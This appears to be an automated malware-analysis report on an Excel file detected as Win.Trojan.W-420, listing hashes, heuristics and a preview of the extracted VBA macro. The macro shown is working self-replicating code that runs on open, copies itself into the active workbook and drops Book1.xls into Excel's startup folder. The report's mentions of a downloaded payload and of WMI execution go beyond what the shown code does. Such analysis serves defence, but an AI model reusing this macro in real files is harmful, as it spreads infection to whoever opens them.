Office (OLE) malware analysis — malicious · a7066a607b4ac044

MALICIOUS

Office (OLE)

24.5 KB Created: 1999-10-01 18:41:06 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 121dbe508f688959971aee02b71fb053 SHA-1: 5d3ac15e26cde3ea7a4822618c78c6ee0dd47d6d SHA-256: a7066a607b4ac044d41a00596bd0b99095c2c50ec3d14140c18f36cda9dc6182

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1546.003 Event Triggered Execution: Windows Management Instrumentation

The critical heuristic OLE_VBA_WBOPEN indicates the presence of a Workbook_Open macro, which is executed automatically when the Excel file is opened. The VBA code attempts to overwrite the current workbook and save it as 'Book1.xls' in the application's startup path, likely to establish persistence or facilitate the execution of a downloaded payload. The ClamAV detection further confirms the malicious nature of the file.

Heuristics 3

ClamAV: Win.Trojan.W-420 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.W-420
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1482 bytes
SHA-256: `00ff5a71cfb0dec9cd7c5404d60104fd1956695eb50b0c8e3446de3e305310ad`
Detection ClamAV: Win.Trojan.W-420 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() V1 = ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) With ActiveWorkbook.VBProject.VBComponents.Item(1).CodeModule .DeleteLines 1, .CountOfLines .AddFromString V1 End With ActiveWorkbook.SaveAs FileName:=ActiveWorkbook.FullName ActiveWorkbook.SaveAs FileName:=Application.StartupPath & "Book1.xls" End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.